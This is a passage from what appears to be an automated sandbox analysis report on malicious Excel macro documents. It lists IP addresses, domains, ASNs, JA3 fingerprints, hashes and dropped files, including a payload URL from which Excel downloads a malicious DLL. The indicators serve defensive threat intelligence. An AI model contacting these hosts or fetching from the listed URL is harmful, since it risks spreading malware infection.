                                                                        45.155.173.242SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                              Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                    Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Exploit.Siggen3.10048.21670.xlsGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Exploit.Siggen3.10048.21085.xlsGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Exploit.Siggen3.10048.3997.xlsGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Heur.31861.xlsGet hashmaliciousBrowse
                                                                                                    185.81.0.78SecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php
                                                                                                    Sign-636.xlsGet hashmaliciousBrowse
                                                                                                    • www.chipmania.it/mails/open.php

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    ident.meSecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.15397.xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.426.xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    SecuriteInfo.com.Heur.31861.xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.9634.31858.xlsGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    0zwHgf4MZ6.exeGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    Rf1jy0FVcu.exeGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    RJVPg3z2Pu.exeGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    qy2ha7YNc2.exeGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    HfgoPFBORt.exeGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    PugSOXI5Eu.exeGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    WR7fzVlV34.exeGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25
                                                                                                    6SRdYNN63E.exeGet hashmaliciousBrowse
                                                                                                    • 176.58.123.25

                                                                                                    ASN

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    DYNUUSSecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    Sign_1136845514-2138034493.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.21670.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.926.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    upload-1015096714-954471831.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    SecuriteInfo.com.Heur.31861.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    0944mr8IJ0.exeGet hashmaliciousBrowse
                                                                                                    • 142.202.191.151
                                                                                                    3H5uZw7X3l.exeGet hashmaliciousBrowse
                                                                                                    • 142.202.191.151
                                                                                                    COMBAHTONcombahtonGmbHDESecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    Sign-488964532_2104982999.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    kAZyIwSSsf.exeGet hashmaliciousBrowse
                                                                                                    • 185.234.72.84
                                                                                                    nazi.exeGet hashmaliciousBrowse
                                                                                                    • 212.114.52.24
                                                                                                    SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    Sign_77624265-298090224.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.21670.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.21085.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10089.3000.xlsGet hashmaliciousBrowse
                                                                                                    • 185.234.72.84
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.3997.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.21627.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    DocuSign_1618411389_250497852.xlsGet hashmaliciousBrowse
                                                                                                    • 185.234.72.84
                                                                                                    DocuSign_139380140_1184163298.xlsGet hashmaliciousBrowse
                                                                                                    • 185.234.72.84
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10048.18578.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    Quote RF-E79-STD-2021-087.xlsxGet hashmaliciousBrowse
                                                                                                    • 45.147.230.34
                                                                                                    SecuriteInfo.com.Heur.31861.xlsGet hashmaliciousBrowse
                                                                                                    • 45.155.173.242
                                                                                                    SERVERPLAN-ASITSecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78
                                                                                                    Sign-636.xlsGet hashmaliciousBrowse
                                                                                                    • 185.81.0.78

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    8c4a22651d328568ec66382a84fc505fSecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    Sign-636.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    Sign-979329054_1327186231.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    Sign-707465831_1420670581.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.11712.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.28224.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242
                                                                                                    SecuriteInfo.com.Heur.13393.xlsGet hashmaliciousBrowse
                                                                                                    • 142.202.191.164
                                                                                                    • 45.155.173.242

                                                                                                    Dropped Files

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkesSecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                        SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                          SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                              SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                      SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                        SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                          SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                            SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                              SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                  SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                    SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                      SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                        Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                          Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                            C:\Users\user\BASE.BABAASecuriteInfo.com.Exploit.Siggen3.10350.13127.xlsGet hashmaliciousBrowse
                                                                                                                                              SecuriteInfo.com.Exploit.Siggen3.10350.857.xlsGet hashmaliciousBrowse
                                                                                                                                                SecuriteInfo.com.Exploit.Siggen3.10350.12632.xlsGet hashmaliciousBrowse
                                                                                                                                                  SecuriteInfo.com.Exploit.Siggen3.10350.20211.xlsGet hashmaliciousBrowse
                                                                                                                                                    SecuriteInfo.com.Exploit.Siggen3.10350.27303.xlsGet hashmaliciousBrowse
                                                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.24644.xlsGet hashmaliciousBrowse
                                                                                                                                                        SecuriteInfo.com.Exploit.Siggen3.10350.15803.xlsGet hashmaliciousBrowse
                                                                                                                                                          SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                                            SecuriteInfo.com.Exploit.Siggen3.10350.31033.xlsGet hashmaliciousBrowse
                                                                                                                                                              SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                                                SecuriteInfo.com.Heur.1181.xlsGet hashmaliciousBrowse
                                                                                                                                                                  SecuriteInfo.com.Heur.21235.xlsGet hashmaliciousBrowse
                                                                                                                                                                    SecuriteInfo.com.Heur.15875.xlsGet hashmaliciousBrowse
                                                                                                                                                                      SecuriteInfo.com.Heur.21759.xlsGet hashmaliciousBrowse
                                                                                                                                                                        SecuriteInfo.com.Heur.2804.xlsGet hashmaliciousBrowse
                                                                                                                                                                          SecuriteInfo.com.Heur.1138.xlsGet hashmaliciousBrowse
                                                                                                                                                                            SecuriteInfo.com.Heur.11266.xlsGet hashmaliciousBrowse
                                                                                                                                                                              SecuriteInfo.com.Heur.18554.xlsGet hashmaliciousBrowse
                                                                                                                                                                                Sign-636.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  Sign-92793351_1597657581.xlsGet hashmaliciousBrowse

                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                    Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):59134
                                                                                                                                                                                    Entropy (8bit):7.995450161616763
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                                    MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                                    SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                                    SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                                    SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                    Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                    Entropy (8bit):3.066589575667779
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:kKo4PbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:5W3kPlE99SNxAhUeo+aKt
                                                                                                                                                                                    MD5:46ABC96344F13B0AFD895852E597F1B2
                                                                                                                                                                                    SHA1:E8B264BB149858AEF57245C350FD93636B8736C5
                                                                                                                                                                                    SHA-256:E821AE09E22728DC49926ADEA5C6684D93A86343956BE54515FFD6CCA30944E2
                                                                                                                                                                                    SHA-512:CF4ECB5D0F6CC69A071650368E2B990136A8CEC81EDF151267B5E6332DFC8C09BCFFE1D5CB75FF9E549EEA47FE3DF9211123B1CCE1A7A362B83E46242D8E7BAA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview: p...... ........e!.lz...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes
                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4591104
                                                                                                                                                                                    Entropy (8bit):5.0540147937501265
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                                    MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                                    SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                                    SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                                    SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 11%, Browse
                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.857.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.12632.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.20211.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.27303.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.24644.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Sign-636.xls, Detection: malicious, Browse
                                                                                                                                                                                    • Filename: Sign-92793351_1597657581.xls, Detection: malicious, Browse
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    IE Cache URL:http://www.chipmania.it/mails/open.php
                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\64CE0000
